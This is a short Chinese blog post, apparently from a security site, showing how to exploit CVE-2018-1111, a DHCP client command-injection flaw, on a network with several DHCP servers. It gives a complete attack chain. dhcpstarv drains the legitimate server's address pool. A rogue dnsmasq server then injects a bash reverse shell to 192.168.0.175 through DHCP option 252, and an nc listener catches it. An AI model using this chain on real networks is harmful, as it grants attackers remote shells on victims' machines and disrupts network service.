CVE-2018-1111实战中的一个小问题

如果环境中存在两个或者多个DHCP服务,怎么才能从我们指定的DHCP分配IP呢??如果攻击DHCP网关可能导致内部断网,这样必然影响我们进一步深入渗透。

办法呢...就是使用dhcpstarv来榨干默认DHCP地址池IP!

CVE-2018-1111实战中的一个小问题

payload

dnsmasq -dC dnsmasq.conf --dhcp-option="252,x '&bash -i >& /dev/tcp/192.168.0.175/90 0>&1 #"

dnsmasq.conf

bind-interfaces

interface=eth0

except-interface=lo

dhcp-range=192.168.0.1,192.168.0.254,12h

conf-file=/dev/null

dhcp-option=6,192.168.0.1

dhcp-option=3,192.168.0.2

dhcpstarv

dhcpstarv -i eth0 -e 192.168.0.175 -e 192.168.0.124

预留出攻击机以及指定分配靶机IP

NC

nc -lvp 90

本文由 华盟网 作者:congtou 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

0

发表评论